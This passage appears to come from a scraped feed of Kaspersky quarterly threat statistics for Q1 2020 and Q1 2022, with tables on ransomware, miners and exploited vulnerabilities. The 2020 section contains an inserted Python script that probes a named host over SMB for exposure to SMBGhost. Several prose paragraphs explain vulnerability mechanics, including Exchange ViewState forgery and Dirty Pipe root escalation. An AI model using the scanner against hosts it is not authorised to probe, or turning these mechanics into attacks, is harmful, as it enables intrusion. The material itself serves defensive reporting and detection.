GandCrab | Trojan-Ransom.Win32.GandCrypt | 7.73 \n5 | Stop | Trojan-Ransom.Win32.Stop | 6.62 \n6 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 4.28 \n7 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 4.15 \n8 | PolyRansom/VirLock | Virus.Win32.PolyRansom / Trojan-Ransom.Win32.PolyRansom | 2.96 \n9 | Crysis/Dharma | Trojan-Ransom.Win32.Crusis | 2.02 \n10 | (generic verdict) | Trojan-Ransom.Win32.Generic | 1.56 \n \n_* Unique Kaspersky users attacked by the specified family of ransomware trojans as a percentage of all users attacked by ransomware trojans._\n\n## Miners\n\n### Number of new modifications\n\nIn Q1 2020, Kaspersky solutions detected 192,036 new miner modifications.\n\n_Number of new miner modifications, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13201558/sl_malware_report_16-en-miner-kolichestvo-novyh-modifikacij.png>)_\n\n### Number of users attacked by miners\n\nIn Q1, we detected attacks using miners on the computers of 518,857 unique users of Kaspersky Lab products worldwide.\n\n_Number of unique users attacked by miners, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13201637/sl_malware_report_17-en-miner-kolichestvo-polzovatelej-atakovannyh-majnerami.png>)_\n\n### Attack geography\n\n_Geography of miner attacks, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13201719/sl_malware_report_18-en-miner-map.png>)_\n\n**Top 10 countries attacked by miners**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Afghanistan | 6.72 \n2 | Ethiopia | 4.90 \n3 | Tanzania | 3.26 \n4 | Sri Lanka | 3.22 \n5 | Uzbekistan | 3.10 \n6 | Rwanda | 2.56 \n7 | Vietnam | 2.54 \n8 | Kazakhstan | 2.45 \n9 | Mozambique | 1.96 \n10 | Pakistan | 1.67 \n \n_* Excluded are countries with relatively few users of Kaspersky products (under 50,000)._ \n_** Unique users whose computers were 
attacked by miners as a percentage of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by cybercriminals during cyberattacks\n\nWe have already noted that Microsoft Office vulnerabilities are the most commonly exploited. Q1 2020 was no exception: the share of exploits for them grew to 74.83%. The most popular was [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>), a stack buffer overflow in the Equation Editor component (EQNEDT32.EXE). Hard on its heels was [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>), a Composite Moniker flaw that lets a malicious scriptlet embedded as an OLE object inside an Office document run when the document is opened. [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>), a second Equation Editor overflow, and [CVE-2017-8759](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8759>), a code-injection flaw in the .NET Framework WSDL parser reachable from an Office document, were also popular with attackers. Where Microsoft Office has been left without security updates, these vulnerabilities are exploited reliably and the user's system is infected; all four have had patches available since 2017 and early 2018, so their continued popularity reflects unpatched installations rather than new research.\n\nIn second place were exploits for vulnerabilities in web browsers (11.06%). In Q1, cybercriminals attacked a whole host of browsers, including Microsoft Internet Explorer, Google Chrome and Mozilla Firefox. What's more, some of the vulnerabilities were used in APT attacks, such as [CVE-2020-0674](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0674>), a memory-corruption bug in the handling of objects in the legacy JScript scripting engine (jscript.dll) in Internet Explorer that leads to code execution. 
Another example is the previously identified [CVE-2019-17026](<https://nvd.nist.gov/vuln/detail/CVE-2019-17026>), a type confusion vulnerability in the IonMonkey JIT compiler of Mozilla Firefox, which also leads to remote code execution. Both browser exploits, when successful, end in a malware infection. A targeted attack against Google Chrome was also detected that exploited the RCE vulnerability [CVE-2020-6418](<https://nvd.nist.gov/vuln/detail/CVE-2020-6418>) in the V8 JavaScript engine, and the dangerous RCE vulnerability [CVE-2020-0767](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0767>) was found in the ChakraCore scripting engine used by Microsoft Edge. Modern browsers have their own protection mechanisms, above all the renderer sandbox, but attackers keep finding ways around them, very often by chaining a renderer exploit with a separate sandbox escape or privilege escalation. Keeping the operating system and software up to date at all times is therefore vital.\n\n_Distribution of exploits used in attacks by type of application attacked, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13201812/sl_malware_report_19-vuln.png>)_\n\nThis quarter, a wide range of critical vulnerabilities were detected in operating systems and their components.\n\n * [CVE-2020-0601](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0601>) is an error in the core cryptographic library of Windows (crypt32.dll) in the validation of certificates that use elliptic-curve keys: the library accepted a certificate carrying explicit curve parameters chosen by the attacker without checking them against the curve of the trusted certificate it was supposedly signed by. 
This vulnerability enables the use of fake certificates that the system recognizes as legitimate, for example for code signing or TLS.\n * [CVE-2020-0729](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0729>) is a vulnerability in the processing of LNK files in Windows, which allows remote code execution if the user opens a malicious shortcut.\n * [CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>) is the result of a default configuration error in Microsoft Exchange Server: every installation shipped with the same static validationKey and decryptionKey for the serialized ASP.NET ViewState of the Exchange Control Panel, so an attacker with any valid mailbox credentials can forge a ViewState payload that the server deserializes, executing the attacker's code on the server side with SYSTEM rights. The patch generates unique keys per installation; a server still carrying the well-known keys in its web.config remains exploitable.\n\nVarious network attacks on system services and network protocols were as popular as ever. We continue to detect attempts to exploit vulnerabilities in the SMB protocol using EternalBlue, EternalRomance and similar exploit sets. In Q1 2020, a new vulnerability, [CVE-2020-0796](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>) (SMBGhost), was found in the compression feature of SMBv3.1.1. It leads to remote code execution without any credentials, since the faulty code runs before the authentication stage; however, only Windows 10 and Windows Server versions 1903 and 1909 implement that feature and are affected. Until the patch is installed, compression can be disabled on the server (the DisableCompression DWORD in the Parameters key of the LanmanServer service), which blocks the server-side vector but does not protect a client that connects to a malicious server. Two critical vulnerabilities, [CVE-2020-0609](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0609>) and [CVE-2020-0610](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0610>), were also found in Remote Desktop Gateway that let an unauthenticated attacker execute code on the target system. 
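The SMBGhost precondition described above can be checked from the network without any exploit: a server that answers an SMB2 NEGOTIATE with dialect 3.1.1 and a compression context that advertises a real algorithm exposes the decompression path the bug lives in. The following Python script is an added example, not part of the Kaspersky report or its tooling; the server reply it parses is constructed in `constructed_negotiate_response()` to mirror the MS-SMB2 layout (the security blob is a placeholder), and `scan()` sends the real request to a host you name.

```python
import os
import socket
import struct

# Wire constants from MS-SMB2.
SMB2_MAGIC = b"\xfeSMB"
SMB2_NEGOTIATE = 0x0000
SMB2_FLAGS_SERVER_TO_REDIR = 0x00000001
DIALECT_311 = 0x0311
CTX_PREAUTH_INTEGRITY = 0x0001
CTX_COMPRESSION = 0x0003          # algorithms: 1 LZNT1, 2 LZ77, 3 LZ77+Huffman, 0 none


def _pad8(buf):
    # negotiate contexts sit on 8-byte boundaries measured from the SMB2 header
    return buf + b"\x00" * (-len(buf) % 8)


def _smb2_header(command, flags=0):
    # ProtocolId, StructureSize, CreditCharge, Status, Command, CreditRequest, Flags,
    # NextCommand, MessageId, Reserved, TreeId, SessionId, Signature
    return struct.pack("<4sHHIHHIIQIIQ16s", SMB2_MAGIC, 64, 0, 0, command, 1, flags,
                       0, 0, 0, 0, 0, b"\x00" * 16)


def _context(ctx_type, data):
    return struct.pack("<HHI", ctx_type, len(data), 0) + data


def build_negotiate_request():
    """SMB2 NEGOTIATE offering dialects up to 3.1.1 plus a compression context; a
    compression-capable server answers with its own compression context."""
    dialects = (0x0202, 0x0210, 0x0300, 0x0302, DIALECT_311)
    fixed_len = 36 + 2 * len(dialects)
    ctx_offset = 64 + fixed_len + (-(64 + fixed_len) % 8)
    preauth = struct.pack("<HHH", 1, 32, 0x0001) + os.urandom(32)   # SHA-512 + salt
    compression = struct.pack("<HHI", 3, 0, 0) + struct.pack("<3H", 1, 2, 3)
    contexts = _pad8(_context(CTX_PREAUTH_INTEGRITY, preauth)) + _context(CTX_COMPRESSION, compression)
    body = struct.pack("<HHHHI16sIHH", 36, len(dialects), 0x0001, 0, 0x00000040,
                       os.urandom(16), ctx_offset, 2, 0)
    body += struct.pack("<%dH" % len(dialects), *dialects)
    smb = _pad8(_smb2_header(SMB2_NEGOTIATE) + body) + contexts
    return struct.pack(">I", len(smb)) + smb      # 4-byte NetBIOS session header


def parse_negotiate_response(pkt):
    """Dialect, signing policy and advertised compression algorithms from a NEGOTIATE response."""
    smb = pkt[4:]
    if smb[:4] != SMB2_MAGIC:
        raise ValueError("not an SMB2 packet")
    status, command = struct.unpack_from("<IH", smb, 8)
    if command != SMB2_NEGOTIATE or status != 0:
        raise ValueError("unexpected command 0x%04x / status 0x%08x" % (command, status))
    (_, sec_mode, dialect, ctx_count, _guid, _caps, _mt, _mr, _mw, _st, _sst,
     _sec_off, _sec_len, ctx_off) = struct.unpack_from("<HHHH16sIIIIQQHHI", smb, 64)
    if dialect != DIALECT_311:
        ctx_count = 0            # the count field is reserved below 3.1.1
    algorithms, off = [], ctx_off
    for _ in range(ctx_count):
        ctx_type, data_len, _ = struct.unpack_from("<HHI", smb, off)
        data = smb[off + 8:off + 8 + data_len]
        if ctx_type == CTX_COMPRESSION:
            count = struct.unpack_from("<H", data, 0)[0]
            algorithms = list(struct.unpack_from("<%dH" % count, data, 8))
        off += 8 + data_len
        off += -off % 8
    return {"dialect": dialect, "signing_required": bool(sec_mode & 2), "compression": algorithms}


def smbghost_exposed(info):
    """SMB 3.1.1 with a real compression algorithm advertised: the decompression path
    CVE-2020-0796 lives in is reachable. Not proof that the host is unpatched."""
    return info["dialect"] == DIALECT_311 and any(a != 0 for a in info["compression"])


def scan(host, port=445, timeout=3.0):
    """Send one NEGOTIATE to a real host and parse what it advertises."""
    with socket.create_connection((host, port), timeout=timeout) as sock, sock.makefile("rb") as rd:
        sock.sendall(build_negotiate_request())
        head = rd.read(4)
        return parse_negotiate_response(head + rd.read(struct.unpack(">I", head)[0]))


def constructed_negotiate_response(dialect=DIALECT_311, algorithms=(1,)):
    """Constructed stand-in for a Windows 10 1903/1909 answer (not a capture); the
    8-byte security blob is a placeholder for the real SPNEGO token."""
    sec_blob = b"\x00" * 8
    ctx_count = 2 if dialect == DIALECT_311 else 0
    ctx_off = 64 + 64 + len(sec_blob)
    ctx_off += -ctx_off % 8
    body = struct.pack("<HHHH16sIIIIQQHHI", 65, 0x0001, dialect, ctx_count, b"\x11" * 16,
                       0x2F, 0x800000, 0x800000, 0x800000, 0, 0, 128, len(sec_blob),
                       ctx_off if ctx_count else 0)
    smb = _smb2_header(SMB2_NEGOTIATE, SMB2_FLAGS_SERVER_TO_REDIR) + body + sec_blob
    if ctx_count:
        preauth = struct.pack("<HHH", 1, 32, 0x0001) + b"\x22" * 32
        comp = struct.pack("<HHI", len(algorithms), 0, 0) + struct.pack("<%dH" % len(algorithms), *algorithms)
        smb = _pad8(smb) + _pad8(_context(CTX_PREAUTH_INTEGRITY, preauth)) + _context(CTX_COMPRESSION, comp)
    return struct.pack(">I", len(smb)) + smb
```

`smbghost_exposed(scan("10.0.0.5"))` reports whether the attack surface is reachable on that host, not whether it is patched: the March 2020 fix leaves compression enabled, so a positive result means the host needs either the patch confirmed from the inside or the DisableCompression workaround. A server with the workaround applied answers with algorithm 0 or no compression context, and a server below 3.1.1 never carries contexts at all; the parser handles both.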
In addition, password brute-forcing against Remote Desktop Services, Microsoft SQL Server and SMB became more frequent.\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Countries that are sources of web-based attacks: Top 10\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn Q1 2020, Kaspersky solutions defeated 726,536,269 attacks launched from online resources located in 203 countries worldwide. As many as 442,039,230 unique URLs were recognized as malicious by Web Anti-Virus components.\n\n_Distribution of web-based attack sources by country, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13202037/sl_malware_report_20-en-web-source.png>)_\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country, we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. 
The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include Web Anti-Vir
us detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Bulgaria | 13.89 \n2 | Tunisia | 13.63 \n3 | Algeria | 13.15 \n4 | Libya | 12.05 \n5 | Bangladesh | 9.79 \n6 | Greece | 9.66 \n7 | Latvia | 9.64 \n8 | Somalia | 9.20 \n9 | Philippines | 9.11 \n10 | Morocco | 9.10 \n11 | Albania | 9.09 \n12 | Taiwan, Province of China | 9.04 \n13 | Mongolia | 9.02 \n14 | Nepal | 8.69 \n15 | Indonesia | 8.62 \n16 | Egypt | 8.61 \n17 | Georgia | 8.47 \n18 | France | 8.44 \n19 | Palestine | 8.34 \n20 | Qatar | 8.30 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky products in the country._\n\n_These statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky products who consented to providing statistical data._\n\nOn average, 6.56% of Internet users' computers worldwide experienced at least one **Malware-class** attack.\n\n_Geography of malicious web-based attacks, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13202126/sl_malware_report_21-en-web-map.png>)_\n\n## Local threats\n\n_In this section, we analyze statistical data obtained from the OAS and ODS modules in Kaspersky products. 
It takes into account malicious programs that were found directly on users' computers or removable media connected to computers (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\nIn Q1 2020, our File Anti-Virus registered **164,653,290** malicious and potentially unwanted objects.\n\n### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal-computer infection in different countries.\n\nNote that this rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Afghanistan | 52.20 \n2 | Tajikistan | 47.14 \n3 | Uzbekistan | 45.16 \n4 | Ethiopia | 45.06 \n5 | Myanmar | 43.14 \n6 | Bangladesh | 42.14 \n7 | Kyrgyzstan | 41.52 \n8 | Yemen | 40.88 \n9 | China | 40.67 \n10 | Benin | 40.21 \n11 | Mongolia | 39.58 \n12 | Algeria | 39.55 \n13 | Laos | 39.21 \n14 | Burkina Faso | 39.09 \n15 | Malawi | 38.42 \n16 | Sudan | 38.34 \n17 | Rwanda | 37.84 \n18 | Iraq | 37.82 \n19 | Vietnam | 37.42 \n20 | Mauritania | 37.26 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users on whose computers **Malware-class** local threats were blocked as a percentage of all unique users of Kaspersky products in the country._\n\n_Geography of local infection attempts, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13202208/sl_malware_report_22-en-local-map.png>)_\n\nOverall, 19.16% of user computers globally 
faced at least one **Malware**-class local threat during Q1.", "cvss3": {}, "published": "2020-05-20T10:00:43", "type": "securelist", "title": "IT threat evolution Q1 2020. Statistics", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2017-8570", "CVE-2017-8759", "CVE-2018-0802", "CVE-2019-17026", "CVE-2020-0601", "CVE-2020-0609", "CVE-2020-0610", "CVE-2020-0674", "CVE-2020-0688", "CVE-2020-0729", "CVE-2020-0767", "CVE-2020-0796", "CVE-2020-6418"], "modified": "2020-05-20T10:00:43", "id": "SECURELIST:D0FFA6E46D43B7A592C34676F2EF3EDB", "href": "https://securelist.com/it-threat-evolution-q1-2020-statistics/96959/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-30T13:56:48", "description": "\n\n * [IT threat evolution in Q1 2022](<https://securelist.com/it-threat-evolution-q1-2022/106513/>)\n * **IT threat evolution in Q1 2022. Non-mobile statistics**\n * [IT threat evolution in Q1 2022. Mobile statistics](<https://securelist.com/it-threat-evolution-in-q1-2022-mobile-statistics/106589/>)\n\n_These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network, in Q1 2022:\n\n * Kaspersky solutions blocked 1,216,350,437 attacks from online resources across the globe.\n * Web Anti-Virus recognized 313,164,030 unique URLs as malicious.\n * Attempts to run malware for stealing money from online bank accounts were stopped on the computers of 107,848 unique users.\n * Ransomware attacks were defeated on the computers of 74,694 unique users.\n * Our File Anti-Virus detected 58,989,058 unique malicious and potentially unwanted objects.\n\n## Financial threats\n\n### Financial threat statistics\n\nIn Q1 2022 Kaspersky solutions blocked the launch of at least one piece of malware designed to steal money from bank accounts on the computers of 107,848 unique 
users.\n\n_Number of unique users attacked by financial malware, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231205/01-en-malware-report-q1-2022-pc.png>))_\n\n#### Geography of financial malware attacks\n\n_To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country and territory we calculated the share of users of Kaspersky products who faced this threat during the reporting period as a percentage of all users of our products in that country or territory._\n\n_Geography of financial malware attacks, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231231/02-en-malware-report-q1-2022-pc.png>))_\n\n**TOP 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Turkmenistan | 4.5 \n2 | Afghanistan | 4.0 \n3 | Tajikistan | 3.9 \n4 | Yemen | 2.8 \n5 | Uzbekistan | 2.4 \n6 | China | 2.2 \n7 | Azerbaijan | 2.0 \n8 | Mauritania | 2.0 \n9 | Sudan | 1.8 \n10 | Syria | 1.8 \n \n_* Excluded are countries with relatively few Kaspersky product users (under 10,000)._ \n_** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country._\n\n#### TOP 10 banking malware families\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | Ramnit/Nimnul | Trojan-Banker.Win32.Ramnit | 36.5 \n2 | Zbot/Zeus | Trojan-Banker.Win32.Zbot | 16.7 \n3 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 6.7 \n4 | SpyEye | Trojan-Spy.Win32.SpyEye | 6.3 \n5 | Gozi | Trojan-Banker.Win32.Gozi | 5.2 \n6 | Cridex/Dridex | Trojan-Banker.Win32.Cridex | 3.5 \n7 | Trickster/Trickbot | Trojan-Banker.Win32.Trickster | 3.3 \n8 | RTM | Trojan-Banker.Win32.RTM | 2.7 \n9 | BitStealer | Trojan-Banker.Win32.BitStealer | 2.2 \n10 | Danabot | Trojan-Banker.Win32.Danabot | 1.8 \n \n_* Unique users who encountered this malware family as a percentage 
of all users attacked by financial malware._\n\nOur TOP 10 leader changed in Q1: the familiar ZeuS/Zbot (16.7%) dropped to second place and Ramnit/Nimnul (36.5%) took the lead. The TOP 3 was rounded out by CliptoShuffler (6.7%).\n\n## Ransomware programs\n\n### Quarterly trends and highlights\n\n#### Law enforcement successes\n\n * Several members of the REvil ransomware crime group were [arrested](<https://tass.com/society/1388613>) by Russian law enforcement in January. The Russian Federal Security Service (FSB) [says](<http://www.fsb.ru/fsb/press/message/single.htm!id=10439388%40fsbMessage.html>) it seized the following assets from the cybercriminals: "more than 426 million rubles ($5.6 million) including denominated in cryptocurrency; $600,000; 500,000 euros; computer equipment, the crypto wallets that were used to perpetrate crimes, and 20 luxury cars that were purchased with illicitly obtained money."\n * In February, a Canadian citizen was [sentenced](<https://www.bleepingcomputer.com/news/security/netwalker-ransomware-affiliate-sentenced-to-80-months-in-prison/>) to 6 years and 8 months in prison for involvement in NetWalker ransomware attacks (also known as Mailto ransomware).\n * In January, Ukrainian police [arrested](<https://www.bleepingcomputer.com/news/security/ukranian-police-arrests-ransomware-gang-that-hit-over-50-firms/>) a ransomware gang who delivered an unclarified strain of malware via e-mail. According to the statement released by the police, over fifty companies in the United States and Europe were attacked by the cybercriminals.\n\n#### HermeticWiper, HermeticRansom and RUransom, etc.\n\nIn February, new malware was discovered which carried out attacks with the aim of destroying files. 
Two pieces of malware \u2014 a Trojan called HermeticWiper that destroys data and a cryptor called [HermeticRansom](<https://securelist.com/elections-goransom-and-hermeticwiper-attack/105960/>) \u2014 were both [used](<https://www.kaspersky.com/blog/hermeticransom-hermeticwiper-attacks-2022/43825/>) in cyberattacks in Ukraine. That February, Ukrainian systems were attacked by another Trojan called IsaacWiper, followed by a third Trojan in March called CaddyWiper. The apparent aim of this malware family was to render infected computers unusable leaving no possibility of recovering files.\n\nAn intelligence team later discovered that HermeticRansom only superficially encrypts files, and ones encrypted by the ransomware [can be decrypted](<https://threatpost.com/free-hermeticransom-ransomware-decryptor-released/178762/>).\n\nRUransom malware was discovered in March, which was created to encrypt files on computers in Russia. The analysis of the malicious code revealed it was developed to wipe data, as RUransom generates keys for all the victim's encrypted files without storing them anywhere.\n\n#### Conti source-code leak\n\nThe ransomware group Conti had its source code leaked along with its chat logs which were made public. It happened shortly after the Conti group [expressed](<https://www.theverge.com/2022/2/28/22955246/conti-ransomware-russia-ukraine-chat-logs-leaked>) support for the Russian government's actions on its website. The true identity of the individual who leaked the data is currently unknown. 
According to different versions, it could have been a researcher or an insider in the group who disagrees with its position.\n\nWhoever it may have been, the leaked ransomware source codes in the public domain will obviously be at the fingertips of other cybercriminals, which is what happened on more than one occasion with examples like [Hidden Tear](<https://securelist.com/hidden-tear-and-its-spin-offs/73565/>) and Babuk.\n\n#### Attacks on NAS devices\n\nNetwork-attached storage (NAS) devices continue to be targeted by ransomware attacks. A new [wave of Qlocker Trojan infections](<https://www.bleepingcomputer.com/news/security/qlocker-ransomware-returns-to-target-qnap-nas-devices-worldwide/>) on QNAP NAS devices occurred in January following a brief lull which lasted a few months. A new form of ransomware infecting QNAP NAS devices also appeared in the month of January called [DeadBolt](<https://www.bleepingcomputer.com/news/security/qnap-warns-of-new-deadbolt-ransomware-encrypting-nas-devices/>), and [ASUSTOR](<https://www.bleepingcomputer.com/news/security/deadbolt-ransomware-now-targets-asustor-devices-asks-50-btc-for-master-key/>) devices became its new target in February.\n\n#### Maze Decryptor\n\nMaster decryption keys for Maze, Sekhmet and Egregor ransomware were made public in February. The keys turned out to be authentic and we increased our support to decrypt files encrypted by these [infamous](<https://securelist.com/maze-ransomware/99137/>) forms of [ransomware](<https://securelist.com/targeted-ransomware-encrypting-data/99255/>) in our RakhniDecryptor utility. 
The decryptor is available on the website of our [No Ransom](<https://noransom.kaspersky.com/>) project and the website of the international NoMoreRansom project in the [Decryption Tools](<https://www.nomoreransom.org/en/decryption-tools.html>) section.\n\n### Number of new modifications\n\nIn Q1 2022, we detected eight new ransomware families and 3083 new modifications of this malware type.\n\n_Number of new ransomware modifications, Q1 2021 \u2014 Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231301/03-en-ru-es-malware-report-q1-2022-pc.png>))_\n\n### Number of users attacked by ransomware Trojans\n\nIn Q1 2022, Kaspersky products and technologies protected 74,694 users from ransomware attacks.\n\n_Number of unique users attacked by ransomware Trojans, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231325/04-en-malware-report-q1-2022-pc.png>))_\n\n### Geography of attacked users\n\n_Geography of attacks by ransomware Trojans, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231349/05-en-malware-report-q1-2022-pc.png>))_\n\n**TOP 10 countries attacked by ransomware Trojans**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Bangladesh | 2.08 \n2 | Yemen | 1.52 \n3 | Mozambique | 0.82 \n4 | China | 0.49 \n5 | Pakistan | 0.43 \n6 | Angola | 0.40 \n7 | Iraq | 0.40 \n8 | Egypt | 0.40 \n9 | Algeria | 0.36 \n10 | Myanmar | 0.35 \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000)._ \n_** Unique users whose computers were attacked by Trojan encryptors as a percentage of all unique users of Kaspersky products in the country._\n\n### TOP 10 most common families of ransomware Trojans\n\n| **Name** | **Verdicts*** | **Percentage of attacked users**** \n---|---|---|--- \n1 | Stop/Djvu | Trojan-Ransom.Win32.Stop | 24.38 \n2 | WannaCry | Trojan-Ransom.Win32.Wanna | 13.71 \n3 | (generic verdict) | 
Trojan-Ransom.Win32.Gen | 9.35 \n4 | (generic verdict) | Trojan-Ransom.Win32.Phny | 7.89 \n5 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 5.66 \n6 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 4.07 \n7 | (generic verdict) | Trojan-Ransom.Win32.CryFile | 3.72 \n8 | PolyRansom/VirLock | Trojan-Ransom.Win32.PolyRansom / Virus.Win32.PolyRansom | 3.37 \n9 | (generic verdict) | Trojan-Ransom.Win32.Crypmod | 3.17 \n10 | (generic verdict) | Trojan-Ransom.Win32.Agent | 1.99 \n \n_* Statistics are based on detection verdicts of Kaspersky products. The information was provided by Kaspersky product users who consented to provide statistical data._ \n_** Unique Kaspersky users attacked by specific ransomware Trojan families as a percentage of all unique users attacked by ransomware Trojans._\n\n## Miners\n\n### Number of new miner modifications\n\nIn Q1 2022, Kaspersky solutions detected 21,282 new modifications of miners.\n\n_Number of new miner modifications, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231418/06-en-malware-report-q1-2022-pc.png>))_\n\n### Number of users attacked by miners\n\nIn Q1, we detected attacks using miners on the computers of 508,449 unique users of Kaspersky products and services worldwide.\n\n_Number of unique users attacked by miners, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231445/07-en-malware-report-q1-2022-pc.png>))_\n\n### Geography of miner attacks\n\n_Geography of miner attacks, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231509/08-en-malware-report-q1-2022-pc.png>))_\n\n**TOP 10 countries attacked by miners**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Ethiopia | 3.01 \n2 | Tajikistan | 2.60 \n3 | Rwanda | 2.45 \n4 | Uzbekistan | 2.15 \n5 | Kazakhstan | 1.99 \n6 | Tanzania | 1.94 \n7 | Ukraine | 1.83 \n8 | Pakistan | 1.79 \n9 | Mozambique | 1.69 \n10 | Venezuela | 
1.67 \n \n_* Excluded are countries with relatively few users of Kaspersky products (under 50,000)._ \n_** Unique users attacked by miners as a percentage of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by criminals during cyberattacks\n\n### Quarter highlights\n\nIn Q1 2022, a number of serious vulnerabilities were found in Microsoft Windows and its components. More specifically, [CVE-2022-21882](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21882>) was found being exploited by an unknown group of cybercriminals: a "type confusion" bug in the win32k.sys driver that an attacker can use to gain SYSTEM privileges. Also worth noting are [CVE-2022-21919](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21919>), an elevation-of-privilege vulnerability in the User Profile Service, and [CVE-2022-21836](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21836>), which can be used to forge digital certificates.\n\nOne of the major talking points in Q1 was an exploit for [CVE-2022-0847](<https://dirtypipe.cm4all.com/>) in the Linux kernel, dubbed "Dirty Pipe". [Researchers discovered](<https://securelist.com/cve-2022-0847-aka-dirty-pipe-vulnerability-in-linux-kernel/106088/>) it while investigating corrupted files: the flags field of a pipe buffer was left uninitialized, so an unprivileged process can write into the page cache of any file it is allowed to open for reading, even a read-only one, without the file on disk being modified. Overwriting a setuid binary or /etc/passwd in this way is enough to elevate the attacker's privileges to root. 
It is worth noting that this vulnerability is easy to exploit (the public proof of concept is a short C program that needs no memory-corruption tricks), so users of all systems should install security patches promptly and use every available means to prevent infection.\n\nWhen it comes to network threats, the quarter again showed how often cybercriminals resort to brute-forcing passwords to gain unauthorized access to network services, most commonly MSSQL, RDP and SMB. Attacks using EternalBlue, EternalRomance and similar exploits remain as popular as ever. Because unpatched versions of Microsoft Exchange Server are still widespread, networks often fall victim to exploits for ProxyToken, ProxyShell, ProxyOracle and similar vulnerabilities. One example of a critical vulnerability found this quarter is remote code execution (RCE) in the Microsoft Windows HTTP protocol stack (HTTP.sys, CVE-2022-21907), which an unauthenticated attacker can trigger remotely by sending a specially crafted packet that abuses HTTP trailer support; on Windows Server 2019 and Windows 10 version 1809 the vulnerable 